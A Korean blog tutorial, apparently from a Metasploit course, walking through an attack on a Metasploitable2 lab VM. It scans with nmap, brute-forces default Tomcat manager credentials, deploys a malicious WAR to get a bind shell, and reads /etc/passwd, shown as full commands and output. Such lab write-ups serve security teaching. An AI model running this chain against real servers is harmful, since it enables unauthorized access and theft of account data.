정보보안(구버전)/Metasploit 2016. 6. 3. 13:39
Metasploit - 08. 취약점 발견 및 공격 (Tomcat 취약점)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Firewall, Metasploitable2-Linux
- 톰켓(Tomcat) : 'http://net123.tistory.com/245' 참고
[실습 단계]
스캔 -> Tomcat 취약점 공격 -> 관리자 ID/PASSWORD 획득 -> Tomcat 관리자 페이지 접속 실시 ->
-> 악성 코드 업로드 실시 -> Metasploitable2-Linux 제어권 획득
Ex1) '192.168.20.204' 스캔 실시
- nmap을 이용하여 '192.168.20.204'에 대해서 스캔을 실시한다.
@ Kali Linux
root@kali:~# nmap -sV 192.168.20.204
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 14:09 KST
Nmap scan report for 192.168.20.204
Host is up (0.00022s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds
Ex2) Metasploitable2-Linux 톰켓 서버 접속 테스트
@ Kali Linux
- 파이어폭스를 이용하여 Metasploitable2-Linux 톰켓 서버 접속이 되는지 확인한다.
root@kali:~# firefox http://192.168.20.204:8180
root@kali:~# firefox http://192.168.20.204:8180/manager/html
Ex3) Tomcat 취약점 공격 실시
root@kali:~# msfconsole -q
msf > search tomcat
~ 중간 생략 ~
msf > search tomcat_mgr_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
~ 중간 생략 ~
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > exploit
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )
~ 중간 생략 ~
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 192.168.20.204:8180 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > exit
root@kali:~#
Ex4) Metasploitable2-Linux 톰켓 관리자 페이지 'tomcat/tomcat'으로 접속 실시
root@kali:~# firefox http://192.168.20.204:8180/manager/html
'tomcat/tomcat' 로그인 실시
톰켓 관리자 페이지 로그인 성공
WAR 파일 업로드 가능
Ex5) 악성 코드 업로드 공격 실시
root@kali:~# msfconsole -q
msf > search tomcat_mgr_deploy
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat // set HTTPPASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.20.204
RHOST => 192.168.20.204
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat // set USERNAMEPASSWORD tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/shell/bind_tcp
PAYLOAD => java/shell/bind_tcp
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.20.204 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.20.204 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6070 bytes as vWzzfJQnXBNpnKWRqgDlpvtW.war ...
[*] Executing /vWzzfJQnXBNpnKWRqgDlpvtW/80DdE2UD8LI6z1F7aNIX34OiaC99nM.jsp...
[*] Undeploying vWzzfJQnXBNpnKWRqgDlpvtW ...
[*] Sending stage (2952 bytes) to 192.168.20.204
[*] Command shell session 1 opened (192.168.20.50:42280 -> 192.168.20.204:4444) at 2016-06-03 14:48:15 +0900
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
hostname
metasploitable
dir
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
~ 중간 생략 ~
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
exit
[*] 192.168.20.204 - Command shell session 2 closed. Reason: Died from EOFError
msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > quit
root@kali:~#
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
Metasploit - 제1장 메타스플로잇 (metaspliot)
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
| Metasploit - 10. 취약점 발견 및 공격 (Window2008 로그 삭제) (0) | 2016.06.03 |
|---|---|
| Metasploit - 09. 취약점 발견 및 공격 (Reverse TCP 공격) (1) | 2016.06.03 |
| Metasploit - 07. 취약점 발견 및 공격 (CVE-2008-0166) (0) | 2016.06.03 |
| Metasploit - 06. 취약점 발견 및 공격 (tikiwiki 취약점 공격) (0) | 2016.06.02 |
| Metasploit - 05. 취약점 발견 및 공격 (MySQL 원격 로그인 시도) (0) | 2016.06.02 |
